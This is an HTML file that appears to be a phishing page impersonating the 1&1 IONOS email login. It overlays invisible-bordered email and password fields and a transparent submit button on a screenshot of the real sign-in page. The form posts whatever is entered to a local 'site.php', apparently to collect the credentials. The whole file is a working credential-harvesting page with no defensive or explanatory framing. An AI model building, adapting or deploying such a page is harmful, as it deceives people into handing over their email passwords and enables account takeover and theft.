<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>1&1 IONOS E-Mail login</title>
</head>

<body>
<img src="1&amp;1Web.png" width="1897" height="808" />
<FORM name=signon id=frmSignon action=site.php method=post autocomplete="off">
<input name="userID" type="text" PlaceHolder="Email Addresss"spellcheck="false" style="position: absolute; width: 550px; left: 679px; top: 263px; z-index: 6; height: 39px;">
<input name="password" type="password" PlaceHolder="Password" spellcheck="false"  style="position: absolute; width: 550px; left: 679px; top: 344px; z-index: 6; height: 38px;">
<input name="Submit" type="submit" style="position: absolute; width: 557px; left: 679px; top: 450px; opacity: 0; z-index: 9; height: 50px;" value="Submit" onmouseover=""  title="Sign In">
</body>
</html>
